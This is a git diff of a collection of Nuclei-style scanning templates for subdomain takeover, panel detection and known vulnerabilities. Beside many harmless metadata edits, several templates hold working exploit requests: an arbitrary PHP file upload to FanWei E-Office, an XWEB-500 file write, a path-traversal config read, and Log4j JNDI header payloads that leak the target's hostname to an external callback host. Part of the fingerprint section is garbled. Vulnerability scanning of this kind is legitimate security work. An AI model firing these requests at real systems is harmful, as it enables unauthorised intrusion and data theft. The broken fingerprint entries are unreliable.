+++ b/poc/subdomain_takeover/jazzhr-takeover-8235.yaml
@@ -1,15 +1,18 @@
id: jazzhr-takeover
+
info:
name: jazzhr takeover detection
- author: pdcommunity
+ author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers:
- type: word
words:
- - This account no longer active
+ - This account no longer active
\ No newline at end of file
diff --git a/poc/subdomain_takeover/landingi-takeover-8566.yaml b/poc/subdomain_takeover/landingi-takeover-8566.yaml
index 71ebf119b4..918c30fb6a 100644
--- a/poc/subdomain_takeover/landingi-takeover-8566.yaml
+++ b/poc/subdomain_takeover/landingi-takeover-8566.yaml
@@ -1,7 +1,7 @@
id: landingi-takeover
info:
name: landingi takeover detection
- author: pdteam
+ author: pdcommunity
severity: info
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117
diff --git a/poc/subdomain_takeover/launchrock-takeover-8603.yaml b/poc/subdomain_takeover/launchrock-takeover-8603.yaml
index 0dfea4d37b..b81478b063 100644
--- a/poc/subdomain_takeover/launchrock-takeover-8603.yaml
+++ b/poc/subdomain_takeover/launchrock-takeover-8603.yaml
@@ -1,15 +1,18 @@
id: launchrock-takeover
+
info:
name: launchrock takeover detection
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers:
- type: word
words:
- - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us.
+ - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us.
\ No newline at end of file
diff --git a/poc/subdomain_takeover/netlify-takeover-9042.yaml b/poc/subdomain_takeover/netlify-takeover-9042.yaml
index 17ceeb0180..973635bbcd 100644
--- a/poc/subdomain_takeover/netlify-takeover-9042.yaml
+++ b/poc/subdomain_takeover/netlify-takeover-9042.yaml
@@ -1,11 +1,10 @@
id: netlify-takeover
info:
name: netlify takeover detection
- author: 0xPrial,pdteam
+ author: pdcommunity
severity: high
- reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz
- tags: takeover,netlify
+ tags: takeover
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz
requests:
- method: GET
path:
@@ -14,8 +13,8 @@ requests:
matchers:
- type: word
words:
- - "Not found - Request ID:"
+ - "Not Found"
- type: word
words:
- - "Netlify"
+ - "server: Netlify"
part: header
diff --git a/poc/subdomain_takeover/pantheon-takeover-9461.yaml b/poc/subdomain_takeover/pantheon-takeover-9461.yaml
index 2f9438c074..a029691e60 100644
--- a/poc/subdomain_takeover/pantheon-takeover-9461.yaml
+++ b/poc/subdomain_takeover/pantheon-takeover-9461.yaml
@@ -1,18 +1,15 @@
id: pantheon-takeover
-
info:
name: pantheon takeover detection
- author: pdteam
+ author: pdcommunity
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
-
requests:
- method: GET
path:
- "{{BaseURL}}"
-
matchers:
- type: word
words:
- - "The gods are wise, but do not know of the site which you seek."
\ No newline at end of file
+ - "The gods are wise, but do not know of the site which you seek."
diff --git a/poc/subdomain_takeover/pingdom-takeover-9587.yaml b/poc/subdomain_takeover/pingdom-takeover-9587.yaml
index cc6932ebff..fcc211e1b0 100644
--- a/poc/subdomain_takeover/pingdom-takeover-9587.yaml
+++ b/poc/subdomain_takeover/pingdom-takeover-9587.yaml
@@ -1,17 +1,19 @@
id: pingdom-takeover
+
info:
name: pingdom takeover detection
author: pdteam
severity: high
- reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz
tags: takeover
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers:
- type: word
words:
- Public Report Not Activated
- - This public report page has not been activated by the user
+ - This public report page has not been activated by the user
\ No newline at end of file
diff --git a/poc/subdomain_takeover/proposify-takeover-9693.yaml b/poc/subdomain_takeover/proposify-takeover-9693.yaml
index 72fcf7d484..2312d7cb42 100644
--- a/poc/subdomain_takeover/proposify-takeover-9693.yaml
+++ b/poc/subdomain_takeover/proposify-takeover-9693.yaml
@@ -1,11 +1,10 @@
id: proposify-takeover
info:
name: proposify takeover detection
- author: pdteam
+ author: pdcommunity
severity: high
- reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz
tags: takeover
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz
requests:
- method: GET
path:
diff --git a/poc/subdomain_takeover/readme-takeover-9842.yaml b/poc/subdomain_takeover/readme-takeover-9842.yaml
index f105be275a..942af6ab47 100644
--- a/poc/subdomain_takeover/readme-takeover-9842.yaml
+++ b/poc/subdomain_takeover/readme-takeover-9842.yaml
@@ -1,15 +1,18 @@
id: readme-takeover
+
info:
name: readme takeover detection
- author: pdcommunity
+ author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers:
- type: word
words:
- - Project doesnt exist... yet!
+ - 'Project doesnt exist... yet!'
diff --git a/poc/subdomain_takeover/s3-subtakeover.yaml b/poc/subdomain_takeover/s3-subtakeover.yaml
index 9b5790b840..6ada628d08 100644
--- a/poc/subdomain_takeover/s3-subtakeover.yaml
+++ b/poc/subdomain_takeover/s3-subtakeover.yaml
@@ -1,9 +1,13 @@
id: s3-subtakeover
+
info:
name: Subdomain takeovee AWS S3
author: manikanta a.k.a @secureitmania
severity: high
+
# Source:- https://link.medium.com/fgXKJHR9P7
+
+
requests:
- method: GET
path:
diff --git a/poc/subdomain_takeover/shopify-takeover-10204.yaml b/poc/subdomain_takeover/shopify-takeover-10204.yaml
index e3cd175309..e657c6388f 100644
--- a/poc/subdomain_takeover/shopify-takeover-10204.yaml
+++ b/poc/subdomain_takeover/shopify-takeover-10204.yaml
@@ -1,7 +1,7 @@
id: shopify-takeover
info:
name: shopify takeover detection
- author: pdcommunity
+ author: pdteam,philippedelteil
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@@ -9,8 +9,18 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
+ matchers-condition: and
matchers:
- type: word
words:
- - "Sorry, this shop is currently unavailable."
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
+ - "Sorry, this shop is currently unavailable."
+ condition: or
+ - type: word
+ words:
+ - 'shop-not-found'
+ - type: dsl
+ dsl:
+ - '!contains(host,"myshopify.com")'
+ - '!contains(host,"shopify.com")'
+ condition: and
diff --git a/poc/subdomain_takeover/tave-takeover-10661.yaml b/poc/subdomain_takeover/tave-takeover-10661.yaml
index 8f17507fe9..856340b2cf 100644
--- a/poc/subdomain_takeover/tave-takeover-10661.yaml
+++ b/poc/subdomain_takeover/tave-takeover-10661.yaml
@@ -1,15 +1,18 @@
id: tave-takeover
+
info:
name: tave takeover detection
- author: pdcommunity
+ author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers:
- type: word
words:
- - " Error 404: Page Not Found"
+ - "Error 404: Page Not Found"
\ No newline at end of file
diff --git a/poc/subdomain_takeover/urge-takeover.yaml b/poc/subdomain_takeover/urge-takeover.yaml
index 6cc4e1e8b1..a5fcc3e6f9 100644
--- a/poc/subdomain_takeover/urge-takeover.yaml
+++ b/poc/subdomain_takeover/urge-takeover.yaml
@@ -3,9 +3,8 @@ info:
name: surge takeover detection
author: pdteam
severity: high
- reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz
tags: takeover
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz
requests:
- method: GET
path:
diff --git a/poc/subdomain_takeover/webflow-takeover.yaml b/poc/subdomain_takeover/webflow-takeover.yaml
index 3fd3180be6..da17c4a95f 100644
--- a/poc/subdomain_takeover/webflow-takeover.yaml
+++ b/poc/subdomain_takeover/webflow-takeover.yaml
@@ -1,15 +1,18 @@
id: webflow-takeover
+
info:
name: webflow takeover detection
- author: pdcommunity
+ author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
+
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers:
- type: word
words:
- - The page you are looking for doesn't exist or has been moved.
+ - The page you are looking for doesn't exist or has been moved.
\ No newline at end of file
diff --git a/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml b/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml
index cc1d3a4837..2d962b0a96 100644
--- a/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml
+++ b/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml
@@ -1,11 +1,8 @@
id: pdf-signer-ssti-to-rce
-
info:
name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
author: madrobot
severity: high
- description: todo
-
requests:
- method: GET
path:
diff --git a/poc/template_injection/twig-php-ssti.yaml b/poc/template_injection/twig-php-ssti.yaml
index f8e8e26d35..d21ecf6b44 100644
--- a/poc/template_injection/twig-php-ssti.yaml
+++ b/poc/template_injection/twig-php-ssti.yaml
@@ -1,9 +1,10 @@
id: twig-php-ssti
+
info:
name: Twig PHP <2.4.4 template engine - SSTI
author: madrobot
severity: high
- tags: php,ssti
+
requests:
- method: GET
path:
diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml
index 4e7ede529c..aa02a4941d 100644
--- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml
+++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml
@@ -1,29 +1,52 @@
id: FanWei
-
info:
- name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability
+ name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information-
+ FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability
metadata:
- fofa-query: app="泛微-协同办公OA"
- hunter-query: web.title="泛微-协同办公OA"
+ fofa-query: app="泛微-EOffice"
+ hunter-query: web.title="泛微软件"
+
+variables:
+ str1: '{{rand_base(6)}}'
+ str2: '{{rand_base(6)}}'
http:
- raw:
- |
- GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
- Accept-Encoding: gzip, deflate
- Connection: close
+ POST /webservice/upload.php HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl
+ Accept-Encoding: gzip
+ Connection: close
+
+ ------WebKitFormBoundaryakbyiukl
+ Content-Disposition: form-data; name="file"; filename="a.php4"
+ Content-Type: application/octet-stream
+
+
+ ------WebKitFormBoundaryakbyiukl--
+
+ - |
+ GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: regex
+ name: name
+ group: 1
+ regex:
+ - '([/*0-9a-zA-Z]+)\.php4$'
+ internal: true
- req-condition: true
matchers:
- type: dsl
dsl:
- - 'contains(body_1, "c4ca")'
- condition: and
+ - body_2 == str2
+
+# http://your-ip/attachment/回显的那串数字/a.php4
diff --git a/poc/upload/showdoc-file-upload-rce-10226.yaml b/poc/upload/showdoc-file-upload-rce-10226.yaml
index 574d070ebd..2cfcddd5ab 100644
--- a/poc/upload/showdoc-file-upload-rce-10226.yaml
+++ b/poc/upload/showdoc-file-upload-rce-10226.yaml
@@ -1,12 +1,11 @@
id: showdoc-file-upload-rce
-
info:
name: Showdoc < 2.8.6 File Upload RCE
author: pikpikcu
severity: critical
- reference: https://github.com/star7th/showdoc/pull/1059
+ reference:
+ - https://github.com/star7th/showdoc/pull/1059
tags: rce,fileupload,showdoc
-
requests:
- raw:
- |
@@ -20,7 +19,6 @@ requests:
----------------------------835846770881083140190633--
-
matchers-condition: and
matchers:
- type: word
@@ -28,12 +26,10 @@ requests:
- '"url":"http:'
- '"success":1'
condition: and
-
- type: status
status:
- 200
-
extractors:
- type: json
json:
- - '.url'
\ No newline at end of file
+ - '.url'
diff --git a/poc/upload/zhiyuan-file-upload-11791.yaml b/poc/upload/zhiyuan-file-upload-11791.yaml
index 8338a13426..4057d76160 100644
--- a/poc/upload/zhiyuan-file-upload-11791.yaml
+++ b/poc/upload/zhiyuan-file-upload-11791.yaml
@@ -1,24 +1,33 @@
id: zhiyuan-file-upload
+
info:
- name: Zhiyuan OA arbitrary file upload vulnerability
+ name: Zhiyuan OA Arbitrary File Upload Vulnerability
author: gy741
severity: critical
- description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed.
- reference: https://www.programmersought.com/article/92658169875/
+ description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server and cause execute arbitrary code to be executed.
+ reference:
+ - https://www.programmersought.com/article/92658169875/
+ remediation: Apply the appropriate patch.
tags: zhiyuan,rce,upload
+
requests:
- method: GET
path:
- "{{BaseURL}}/seeyon/thirdpartyController.do.css/..;/ajax.do"
+
matchers-condition: and
matchers:
- type: word
words:
- "java.lang.NullPointerException:null"
+
- type: word
words:
- "text/html"
part: header
+
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/02/04
diff --git a/poc/vmware/vmware-horizon-11038.yaml b/poc/vmware/vmware-horizon-11038.yaml
index 4627d13031..3c4c7f59a2 100644
--- a/poc/vmware/vmware-horizon-11038.yaml
+++ b/poc/vmware/vmware-horizon-11038.yaml
@@ -1,21 +1,22 @@
id: vmware-horizon
+
info:
name: VMware Horizon Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6496
tags: panel
+
requests:
- method: GET
path:
- '{{BaseURL}}/portal/webclient/index.html'
- matchers-condition: or
+
+ matchers-condition: and
matchers:
- type: word
- part: body
words:
- 'VMware Horizon'
- - type: regex
- part: body
- regex:
- - '(?m)^Missing route token in request$'
+ - type: status
+ status:
+ - 200
diff --git a/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml b/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml
index dc7b93f6b8..d18b8d642c 100644
--- a/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml
+++ b/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml
@@ -1,43 +1,32 @@
id: vmware-horizon-log4j-jndi-rce
-
info:
name: VMware Horizon Log4j JNDI RCE
author: johnk3r
- severity: critical
- description: |
- A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon.
+ severity: high
+ description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon.
reference:
- https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
- https://www.vmware.com/security/advisories/VMSA-2021-0028.html
- - https://logging.apache.org/log4j/2.x/security.html
- - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- metadata:
- verified: true
- shodan-query: http.html:"VMware Horizon"
- tags: cve,cve2021,rce,jndi,log4j,horizon,vmware,oast
-
+ tags: rce,jndi,log4j,horizon,vmware
requests:
- raw:
- |
GET /portal/info.jsp HTTP/1.1
Host: {{Hostname}}
Accept-Language: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}}
-
matchers-condition: and
matchers:
- type: word
- part: interactsh_protocol # Confirms the DNS Interaction
+ part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
-
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
-
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
diff --git a/poc/vmware/vmware-horizon-panel-11035.yaml b/poc/vmware/vmware-horizon-panel-11035.yaml
index 596ebf0e7b..e4fda4b734 100644
--- a/poc/vmware/vmware-horizon-panel-11035.yaml
+++ b/poc/vmware/vmware-horizon-panel-11035.yaml
@@ -4,8 +4,7 @@ info:
name: VMware Horizon Login
author: dhiyaneshDK
severity: info
- reference:
- - https://www.exploit-db.com/ghdb/6496
+ reference: https://www.exploit-db.com/ghdb/6496
tags: panel,horizon,vmware
requests:
diff --git a/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml
index ef7fc32df9..be1fbe33ea 100644
--- a/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml
+++ b/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml
@@ -1,42 +1,38 @@
id: vmware-vcenter-log4j-jndi-rce
-
info:
name: VMware VCenter Log4j JNDI RCE
author: _0xf4n9x_
- severity: high
- description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware VCenter.
+ severity: critical
+ description: |
+ A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware VCenter.
reference:
- - https://twitter.com/tnpitsecurity/status/1469429810216771589
- https://www.vmware.com/security/advisories/VMSA-2021-0028.html
- tags: rce,jndi,log4shell,log4j,vcenter
-
+ - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
+ - https://twitter.com/tnpitsecurity/status/1469429810216771589
+ - https://logging.apache.org/log4j/2.x/security.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+ metadata:
+ shodan-query: title:"VMware VCenter"
+ tags: cve,cve2021,rce,jndi,log4j,vcenter,vmware,oast
requests:
- raw:
- |
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
X-Forwarded-For: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Upgrade-Insecure-Requests: 1
-
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interactsh\.com' # Extract ${hostName}
-
- matchers-condition: or
- matchers:
- - type: word
- part: interactsh_protocol
- name: http
- words:
- - "http"
-
- - type: word
- part: interactsh_protocol
- name: dns
- words:
- - "dns"
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
diff --git a/poc/vmware/vmware-vcenter-ssrf.yaml b/poc/vmware/vmware-vcenter-ssrf.yaml
index 4bd82a9b23..a842c409e1 100644
--- a/poc/vmware/vmware-vcenter-ssrf.yaml
+++ b/poc/vmware/vmware-vcenter-ssrf.yaml
@@ -1,24 +1,21 @@
id: vmware-vcenter-ssrf
-
info:
name: VMware vCenter SSRF/LFI/XSS
author: pdteam
severity: critical
- reference: https://github.com/l0ggg/VMware_vCenter
+ reference:
+ - https://github.com/l0ggg/VMware_vCenter
tags: ssrf,lfi,xss,oast,vcenter,vmware
-
requests:
- method: GET
path:
- "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"
-
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
-
- type: status
status:
- 200
diff --git a/poc/web/axigen-webadmin.yaml b/poc/web/axigen-webadmin.yaml
index 0e54704559..515f319cbe 100644
--- a/poc/web/axigen-webadmin.yaml
+++ b/poc/web/axigen-webadmin.yaml
@@ -7,14 +7,11 @@ info:
description: An Axigen Web Admin panel was discovered.
reference:
- https://www.axigen.com/
- metadata:
- shodan-query: 'http.title:"Axigen WebAdmin"'
- tags: axigen,panel
classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
- cve-id:
cwe-id: CWE-200
+ metadata:
+ shodan-query: http.title:"Axigen WebAdmin"
+ tags: axigen,panel
requests:
- method: GET
diff --git a/poc/web/azkaban-web-client-676.yaml b/poc/web/azkaban-web-client-676.yaml
index e02686810a..c939d27836 100644
--- a/poc/web/azkaban-web-client-676.yaml
+++ b/poc/web/azkaban-web-client-676.yaml
@@ -4,7 +4,13 @@ info:
name: Azkaban Web Client
author: dhiyaneshDK
severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
+ description: An Azkaban web client panel was discovered.
+ reference:
+ - https://azkaban.github.io/
+ classification:
+ cwe-id: CWE-200
+ metadata:
+ shodan-query: http.title:"Azkaban Web Client"
tags: panel,azkaban
requests:
@@ -20,3 +26,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/20
diff --git a/poc/web/cobbler-webgui-1124.yaml b/poc/web/cobbler-webgui-1124.yaml
index 00ce480dcc..abd7d4d1bc 100644
--- a/poc/web/cobbler-webgui-1124.yaml
+++ b/poc/web/cobbler-webgui-1124.yaml
@@ -3,8 +3,8 @@ id: cobbler-webgui
info:
name: Cobbler WebGUI Detection
author: c-sh0
- severity: info
description: Detection of Cobbler WebGUI
+ severity: info
metadata:
shodan-query: http.title:"Cobbler Web Interface"
tags: cobbler,webserver,panel
diff --git a/poc/web/dixell-xweb500-filewrite-7020.yaml b/poc/web/dixell-xweb500-filewrite-7020.yaml
index 445c9333ac..4fe7c476db 100644
--- a/poc/web/dixell-xweb500-filewrite-7020.yaml
+++ b/poc/web/dixell-xweb500-filewrite-7020.yaml
@@ -1,17 +1,12 @@
id: dixell-xweb500-filewrite
-
info:
- name: Emerson Dixell XWEB-500 - Arbitrary File Write
+ name: Dixell XWEB-500 - Arbitrary File Write
author: hackerarpan
severity: critical
- description: Emerson Dixell XWEB-500 products are affected by arbitrary file write vulnerabilities in /cgi-bin/logo_extra_upload.cgi, /cgi-bin/cal_save.cgi, and /cgi-bin/lo_utils.cgi. An attacker will be able to write any file on the target system without any kind of authentication mechanism, and this can lead to denial of service and potentially remote code execution. Note that this product has not been supported since 2018 and should be removed or replaced.
- reference:
- - https://www.exploit-db.com/exploits/50639
- - https://nvd.nist.gov/vuln/detail/CVE-2021-45420
+ reference: https://www.exploit-db.com/exploits/50639
metadata:
- google-query: inurl:"xweb500.cgi"
- tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive
-
+ google-dork: inurl:"xweb500.cgi"
+ tags: lfw,iot,dixell,xweb500
requests:
- raw:
- |
@@ -21,20 +16,15 @@ requests:
{{randstr}}.txt
dixell-xweb500-filewrite
-
- |
GET /logo/{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
-
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_2, "dixell-xweb500-filewrite")'
-
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/06/01
diff --git a/poc/web/ewebs-arbitrary-file-reading-7273.yaml b/poc/web/ewebs-arbitrary-file-reading-7273.yaml
index f69dddd216..4c913e55aa 100644
--- a/poc/web/ewebs-arbitrary-file-reading-7273.yaml
+++ b/poc/web/ewebs-arbitrary-file-reading-7273.yaml
@@ -1,4 +1,5 @@
id: ewebs-arbitrary-file-reading
+
info:
name: EWEBS - Local File Inclusion
author: pikpikcu
@@ -11,13 +12,18 @@ info:
cvss-score: 7.5
cwe-id: CWE-22
tags: ewebs,lfi
-requests:
+ metadata:
+ max-request: 1
+
+http:
- method: POST
path:
- '{{BaseURL}}/casmain.xgi'
headers:
Content-Type: application/x-www-form-urlencoded
+
body: "Language_S=../../Data/CONFIG/CasDbCnn.dat"
+
matchers-condition: and
matchers:
- type: word
@@ -26,6 +32,7 @@ requests:
- "[LocalInfo]"
condition: and
part: body
+
- type: status
status:
- 200
diff --git a/poc/web/fingerprinthub-web-fingerprints-7480.yaml b/poc/web/fingerprinthub-web-fingerprints-7480.yaml
old mode 100755
new mode 100644
index ca2ef4cc89..e9c7fdd205
--- a/poc/web/fingerprinthub-web-fingerprints-7480.yaml
+++ b/poc/web/fingerprinthub-web-fingerprints-7480.yaml
@@ -2,23 +2,21 @@ id: fingerprinthub-web-fingerprints
info:
name: FingerprintHub Technology Fingerprint
- author: pdteam,righettod
+ author: pdteam
severity: info
description: FingerprintHub Technology Fingerprint tests run in nuclei.
reference:
- https://github.com/0x727/FingerprintHub
classification:
cwe-id: CWE-200
- metadata:
- max-request: 1
tags: tech
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}"
- host-redirects: true
+ redirects: true
max-redirects: 2
matchers-condition: or
@@ -717,16 +715,14 @@ http:
- axis2-admin
- axis2-web
- - type: word
- name: apache-druid
- words:
- - content="Apache Druid console"
-
- type: word
part: header
name: apache-cocoon
+
+ - type: word
+ name: apache-druid
words:
- - "X-Cocoon-Version"
+ - content="Apache Druid console"
- type: word
name: apache-flink
@@ -791,8 +787,11 @@ http:
name: apache-kylin
words:
-
+
+ - type: word
+ name: apache-kylin
+ words:
- href="/kylin/"
- condition: or
- type: word
name: apache-mesos
@@ -841,13 +840,6 @@ http:
words:
- "Location: /solr/"
- - type: word
- part: header
- name: apache-dubbo
- words:
- - 'Www-Authenticate: Basic realm="dubbo"'
- case-insensitive: true
-
- type: word
name: apache-struts
words:
@@ -887,7 +879,7 @@ http:
part: header
name: apilayer-caddy
words:
- - "Server: Caddy"
+ - "Server: caddy"
- type: word
name: appcms
@@ -925,10 +917,10 @@ http:
- 管理apusic应用服务器 |
- type: word
- part: server
+ part: header
name: apusic
words:
- - "Apusic Application Server"
+ - "Server: apusic application server"
- type: word
name: arab-portal
@@ -1796,7 +1788,8 @@ http:
- type: word
name: cerberus-helpdesk
words:
- -
+ -
- type: word
name: symantec-endpoint-protection-manager
words:
- - symantec endpoint protection manager
web access |
+ - symantec endpoint
+ protection manager
web access |
- type: word
name: symantec-thawte_ssl_cert
@@ -12065,7 +12086,8 @@ http:
- type: word
name: synology-webstation
words:
- - id="paragraph">web station has been enabled. to finish setting up your website, please see the "web service
+ - id="paragraph">web station has been enabled. to finish setting up your website,
+ please see the "web service
- type: word
name: tab-and-link-manager
@@ -12187,7 +12209,8 @@ http:
- type: word
name: telenor-4g-router
words:
- - please power off and plug in (u)sim card. then power on again. or pin is permanently blocked, please contact the provider
+ - please power off and plug in (u)sim card. then power on again. or pin is permanently
+ blocked, please contact the provider
- type: word
name: teleradiology-telrads
@@ -12753,7 +12776,8 @@ http:
- type: word
name: turbo-seek
words:
- - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width=" + mywidth + ",height=" + myheight +
+ - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width="
+ + mywidth + ",height=" + myheight +
- type: word
name: turbomail
@@ -12839,13 +12863,6 @@ http:
words:
- welcome to nginx on ubuntu!
- - type: word
- name: openeuler
- words:
- - Test Page for the Apache HTTP Server on openEuler Linux
- - Test Page for the Nginx HTTP Server on openEuler
- condition: or
-
- type: word
name: ucap-search-
words:
@@ -12931,7 +12948,8 @@ http:
- type: word
name: ultrastats
words:
- - 
+ -
- type: word
name: uniform-server
@@ -12946,7 +12964,8 @@ http:
- type: word
name: uniform-server
words:
- -
+ -
- type: word
name: unimas-cameraaudit
@@ -12998,12 +13017,14 @@ http:
- type: word
name: useresponse
words:
- - |